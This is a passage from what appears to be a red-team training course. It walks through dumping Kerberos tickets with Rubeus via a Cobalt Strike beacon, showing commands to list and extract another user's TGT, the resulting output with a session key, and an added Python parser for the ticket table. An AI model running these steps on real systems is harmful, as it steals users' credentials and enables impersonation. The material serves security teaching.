Extracting Kerberos Tickets
One unfortunate consequence of the aforementioned techniques is that they obtain handles to sensitive resources, which can be audited and logged quite easily. Rubeus is a C# tool designed for Kerberos interaction and abuses, using legitimate Windows APIs.
Its triage command will list all the Kerberos tickets in your current logon session and, if elevated, from all logon sessions on the machine.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
Action: Triage Kerberos Tickets (All Users)
[*] Current LUID : 0x14b5fa
-----------------------------------------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-----------------------------------------------------------------------------------------------------------------
| 0x14bf5e | bfarmer @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 6:10:14 PM |
| 0x14bf5e | bfarmer @ DEV.CYBERBOTIC.IO | LDAP/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 6:10:14 PM |
| 0x14bf5e | bfarmer @ DEV.CYBERBOTIC.IO | HTTP/squid.dev.cyberbotic.io | 9/1/2022 6:10:14 PM |
| 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 6:10:07 PM |
| 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO | cifs/dc-2.dev.cyberbotic.io | 9/1/2022 6:10:07 PM |
| 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO | ldap/dc-2.dev.cyberbotic.io | 9/1/2022 6:10:07 PM |
| 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO | cifs/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 6:10:07 PM |
| 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO | LDAP/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 6:10:07 PM |
| 0x7049f | jking @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 5:29:20 PM |
| 0x3e4 | wkstn-2$ @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 5:28:29 PM |
| 0x3e4 | wkstn-2$ @ DEV.CYBERBOTIC.IO | HTTP/squid.dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e4 | wkstn-2$ @ DEV.CYBERBOTIC.IO | cifs/dc-2.dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e4 | wkstn-2$ @ DEV.CYBERBOTIC.IO | ldap/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | HTTP/squid.dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | cifs/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | WKSTN-2$ | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | LDAP/dc-2.dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | LDAP/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | wkstn-2$@DEV.CYBERBOTIC.IO | 9/1/2022 7:43:42 AM |
-----------------------------------------------------------------------------------------------------------------
Each user has their own logon session, which is represented by a LUID (locally unique identifier). In this example, we're operating within the LUID of bfarmer, 0x14b5fa. The WKSTN-2$ machine account has its own session, 0x3e4; and jking also has a session, 0x7049f. Tickets for the service name krbtgt are Ticket Granting Tickets (TGTs) and the others are Ticket Granting Service tickets (TGSs). The different ticket types are described in more detail in the Kerberos chapter.
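To make the session structure above concrete, here is an added Python example (not part of the course material or of Rubeus) that parses the triage table into per-LUID sessions, recording which sessions hold a TGT, which service tickets they carry, and which belong to machine accounts; the sample rows are constructed in the layout shown above.

```python
import re

# Constructed sample in the layout of the Rubeus triage table (not captured from a real host).
SAMPLE_TRIAGE = """
 | LUID     | UserName                     | Service                       | EndTime             |
 | 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO  | krbtgt/DEV.CYBERBOTIC.IO      | 9/1/2022 6:10:07 PM |
 | 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO  | cifs/dc-2.dev.cyberbotic.io   | 9/1/2022 6:10:07 PM |
 | 0x7049f  | jking @ DEV.CYBERBOTIC.IO    | krbtgt/DEV.CYBERBOTIC.IO      | 9/1/2022 5:29:20 PM |
 | 0x3e7    | wkstn-2$ @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO      | 9/1/2022 5:28:29 PM |
 | 0x3e7    | wkstn-2$ @ DEV.CYBERBOTIC.IO | LDAP/dc-2.dev.cyberbotic.io   | 9/1/2022 5:28:29 PM |
"""

# A data row starts with a hex LUID; header and dashed rule lines do not match.
ROW_RE = re.compile(
    r"^\s*\|\s*(0x[0-9a-fA-F]+)\s*\|\s*([^|]+?)\s*\|\s*([^|]+?)\s*\|\s*([^|]+?)\s*\|\s*$"
)


def parse_triage(text):
    """Return (luid, user, service, endtime) tuples for every data row in the table."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append(m.groups())
    return rows


def summarize_sessions(rows):
    """Group rows by LUID: owning user, whether a TGT is present, and the service tickets."""
    sessions = {}
    for luid, user, service, _endtime in rows:
        account = user.split(" @ ")[0]
        s = sessions.setdefault(
            luid,
            {"user": user, "tgt": False, "services": [], "machine": account.endswith("$")},
        )
        # krbtgt/<REALM> is the TGT; anything else is a service ticket (TGS).
        if service.lower().startswith("krbtgt/"):
            s["tgt"] = True
        else:
            s["services"].append(service)
    return sessions


if __name__ == "__main__":
    for luid, s in summarize_sessions(parse_triage(SAMPLE_TRIAGE)).items():
        print(luid, s["user"], "TGT" if s["tgt"] else "no TGT", s["services"])
```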
Rubeus' dump command will extract these tickets from memory, but because it uses Windows APIs, it does not need to open suspicious handles to LSASS. If we are not elevated, we can only pull tickets from our own session. Without any further arguments, Rubeus will extract every ticket it can, but we can be more specific by using the /luid and /service parameters.
For example, if we only wanted the TGT for jking, we can do:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x7049f /service:krbtgt
Action: Dump Kerberos Ticket Data (All Users)
[*] Target service : krbtgt
[*] Target LUID : 0x7049f
[*] Current LUID : 0x14b5fa
UserName : jking
Domain : DEV
LogonId : 0x754c2
UserSID : S-1-5-21-569305411-121244042-2357301523-1105
AuthenticationPackage : Kerberos
LogonType : Batch
LogonTime : 10/13/2022 9:36:19 AM
LogonServer : DC-2
LogonServerDNSDomain : DEV.CYBERBOTIC.IO
UserPrincipalName : jking@cyberbotic.io
ServiceName : krbtgt/DEV.CYBERBOTIC.IO
ServiceRealm : DEV.CYBERBOTIC.IO
UserName : jking
UserRealm : DEV.CYBERBOTIC.IO
StartTime : 10/13/2022 9:36:20 AM
EndTime : 10/13/2022 7:36:20 PM
RenewTill : 10/20/2022 9:36:20 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : EIkrCAL8wx98PVRBOZGDKC6Y0KReSosWtvXyv6rIefI=
Base64EncodedTicket :
doIFuj [...snip...] lDLklP
This will output the ticket(s) in base64 encoded format. You may also add the /nowrap option, which formats the base64 encoding onto a single line; this makes copy & pasting much easier.